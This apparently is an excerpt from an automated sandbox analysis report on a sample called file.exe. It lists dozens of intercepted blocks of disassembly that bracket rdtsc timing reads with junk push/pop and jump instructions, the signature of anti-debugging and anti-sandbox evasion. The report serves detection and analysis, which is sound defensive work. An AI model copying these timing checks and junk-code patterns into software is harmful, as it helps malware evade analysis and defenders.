                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1397AF2 second address: 1397AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC8515781D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133CCB5 second address: 133CD2A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FC850CE3D3Fh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop edx 0x00000012 nop 0x00000013 mov ebx, dword ptr [ebp+12481CFBh] 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007FC850CE3D38h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 adc edx, 5DCB1D17h 0x00000039 mov dh, bh 0x0000003b add eax, ebx 0x0000003d mov dword ptr [ebp+122D1F71h], ebx 0x00000043 nop 0x00000044 push ecx 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FC850CE3D49h 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133CD2A second address: 133CD40 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC8515781D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c je 00007FC8515781E4h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133CD40 second address: 133CD44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13980B4 second address: 13980CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jg 00007FC8515781D8h 0x0000000b popad 0x0000000c push ebx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A156A second address: 13A15A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC850CE3D36h 0x0000000a pop ecx 0x0000000b jmp 00007FC850CE3D49h 0x00000010 pop ecx 0x00000011 pushad 0x00000012 pushad 0x00000013 js 00007FC850CE3D36h 0x00000019 js 00007FC850CE3D36h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A15A2 second address: 13A15BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8515781E6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A15BC second address: 13A15C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139F539 second address: 139F564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8515781E7h 0x00000009 jmp 00007FC8515781DEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139F806 second address: 139F80A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139FD0C second address: 139FD12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A0300 second address: 13A030A instructions: 0x00000000 rdtsc 0x00000002 js 00007FC850CE3D36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A05C8 second address: 13A0604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8515781E1h 0x00000009 pop edi 0x0000000a jnl 00007FC8515781EAh 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A0604 second address: 13A0629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC850CE3D36h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FC850CE3D40h 0x00000011 popad 0x00000012 jne 00007FC850CE3D38h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A0BF5 second address: 13A0C07 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC8515781DCh 0x00000008 jnl 00007FC8515781D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A1228 second address: 13A1238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jno 00007FC850CE3D36h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A1238 second address: 13A123D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A123D second address: 13A125E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A125E second address: 13A1264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A1264 second address: 13A1294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC850CE3D49h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FC850CE3D3Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A615A second address: 13A6160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9791 second address: 13A97C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC850CE3D36h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FC850CE3D3Ah 0x00000011 popad 0x00000012 jbe 00007FC850CE3D40h 0x00000018 jmp 00007FC850CE3D3Ah 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FC850CE3D3Ah 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A97C9 second address: 13A97CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A97CD second address: 13A97E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A97E8 second address: 13A9803 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC8515781D6h 0x00000008 jmp 00007FC8515781E1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9803 second address: 13A9809 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9C47 second address: 13A9C55 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC8515781D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9C55 second address: 13A9C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC850CE3D36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B3AC6 second address: 13B3ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B3ACC second address: 13B3AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC850CE3D36h 0x0000000a jmp 00007FC850CE3D48h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B3AEF second address: 13B3AF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B3AF5 second address: 13B3AF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B3AF9 second address: 13B3AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B21B8 second address: 13B21BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B21BE second address: 13B21E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8515781E0h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 js 00007FC8515781D6h 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B21E0 second address: 13B21FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC850CE3D46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B21FB second address: 13B2213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007FC8515781DBh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B2213 second address: 13B222D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC850CE3D36h 0x00000008 jmp 00007FC850CE3D40h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B222D second address: 13B2233 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B239C second address: 13B23A6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC850CE3D36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B23A6 second address: 13B23C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jp 00007FC8515781D6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC8515781DBh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B23C5 second address: 13B23C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B27D6 second address: 13B27E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8515781DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B27E5 second address: 13B27F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FC850CE3D36h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B3966 second address: 13B396A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B396A second address: 13B3970 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BACF9 second address: 13BACFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BAE51 second address: 13BAE57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BAE57 second address: 13BAE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BAE5C second address: 13BAE64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BAE64 second address: 13BAE68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BAE68 second address: 13BAE6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BAE6C second address: 13BAE79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BAE79 second address: 13BAE7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BD635 second address: 13BD63B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BD63B second address: 13BD63F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BD63F second address: 13BD645 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BD4E2 second address: 13BD4F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC850CE3D38h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CD96F second address: 13CD973 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CD973 second address: 13CD984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC850CE3D36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CD984 second address: 13CD98A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CD98A second address: 13CD990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CD990 second address: 13CD9B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop ecx 0x0000000b jo 00007FC8515781E6h 0x00000011 jmp 00007FC8515781E0h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CD9B1 second address: 13CD9C9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC850CE3D38h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007FC850CE3D36h 0x00000012 jnp 00007FC850CE3D36h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D3356 second address: 13D335C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D335C second address: 13D3362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC550 second address: 13DC55C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC8515781DEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC55C second address: 13DC582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC850CE3D47h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007FC850CE3D36h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DDD84 second address: 13DDD8C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DDD8C second address: 13DDD92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1304152 second address: 1304165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FC8515781DEh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DF635 second address: 13DF647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC850CE3D3Dh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E14F8 second address: 13E150E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8515781E0h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E150E second address: 13E1533 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jc 00007FC850CE3D36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FC850CE3D42h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1533 second address: 13E1537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E9FE5 second address: 13E9FF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FC850CE3D36h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F0791 second address: 13F07A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC8515781D6h 0x0000000a popad 0x0000000b jne 00007FC8515781D8h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F6E0F second address: 13F6E15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F6E15 second address: 13F6E1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F6E1B second address: 13F6E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F84D8 second address: 13F84DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F84DE second address: 13F84E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F84E4 second address: 13F84F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007FC8515781DEh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F84F9 second address: 13F8515 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D46h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F8515 second address: 13F8519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F8519 second address: 13F851D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC67D second address: 13FC687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC8515781D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC687 second address: 13FC692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC692 second address: 13FC696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14038CE second address: 14038D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC850CE3D36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14038D8 second address: 14038EB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jnp 00007FC8515781D6h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14038EB second address: 14038FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FC850CE3D3Ch 0x0000000b jnp 00007FC850CE3D36h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14038FC second address: 140390F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8515781DEh 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14005C2 second address: 14005DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC850CE3D44h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14005DA second address: 14005DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1420EBE second address: 1420EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1420EC8 second address: 1420ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141FDA9 second address: 141FDAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14205E9 second address: 1420614 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8515781E6h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC8515781DDh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1420614 second address: 1420618 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
